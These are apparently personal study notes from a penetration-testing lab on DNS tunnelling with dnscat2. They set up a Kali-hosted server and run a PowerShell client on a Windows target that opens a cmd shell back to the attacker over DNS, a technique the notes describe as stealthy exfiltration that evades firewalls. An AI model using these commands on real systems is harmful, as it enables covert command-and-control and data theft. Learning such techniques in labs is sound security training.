11 - DNS Tunneling with dnscat2

# Introduction - `DNScat2` is a tunneling tool that uses DNS to send data between two hosts - Uses an encrypted C2 channel and sends data inside TXT records within the DNS protocol - Usually, every AD domain environment has its own DNS server, which will resolve hostnames to IP addresses and route the traffic to external DNS servers - When using `dnscat2`, address resolution is requested from an external server - When a local DNS server tries to resolve an address, data is exfiltrated and sent over the network instead of a legitimate DNS request - `dnscat2` can be an extremely stealthy approach to exfiltrate data while evading FW detection, which strips the HTTPS connections to sniff traffic # Sequence for `dnscat2` - Install and setup `dns2cat` server on Kali host ```bash #clone repo and install on Kali host git clone https://github.com/iagox86/dnscat2.git cd dnscat2/server/ sudo gem install bundler sudo bundle install #start dnscat2 server on Kali host sudo ruby dnscat2.rb --dns host=<kali_host_ip>,port=53,domain=inlanefreight.local --no-cache ``` - A secret key is generated that we need to take note of to setup the client on Windows target - Download `dnscat2.ps1` and move to Windows target ```bash git clone https://github.com/lukebaggett/dnscat2-powershell.git #serve directory with dnscat2.ps1 from Kali host and download onto Windows target ``` - Once we have `dnscat2.ps1` on the Windows target, import the script and start a tunnel ```powershell Import-Module .\dnscat2.ps1 Start-Dnscat2 -DNSserver <kali_host_ip> -Domain inlanefreight.local -PreSharedSecret <secret_key> -Exec cmd ``` - Confirm session is established on Kali host ![[images/Pasted image 20251023092702.png]] - List options with `?` ![[images/Pasted image 20251023092750.png]] - We can use `dnscat2` to interact with sessions and move further in a target environment - to attach to a session use the following command in `dnscat2`: `window -i <number>` ![[images/Pasted image 20251023092855.png]] # Exercise - Ping and light nmap scan target ![[images/Pasted image 20251023093126.png]]![[images/Pasted image 20251023093132.png]] - Clone and install `dnscat2` on Kali host ![[images/Pasted image 20251023093326.png]] - Setup `dnscat2` on Kali host - Note secret key![[images/Pasted image 20251023093357.png]] - Clone `dnscat2.ps1` ![[images/Pasted image 20251023093627.png]] - RDP connect to target ![[images/Pasted image 20251023094036.png]] - Move `dnscat2.ps1` to target ![[images/Pasted image 20251023094447.png]] - Import script and start tunnel on Windows target ![[images/Pasted image 20251023095239.png]] - Confirm on Kali host and attach to session ![[images/Pasted image 20251023095348.png]] - This console session is very unstable ![[images/Pasted image 20251023095601.png]] - Not a fan of this tool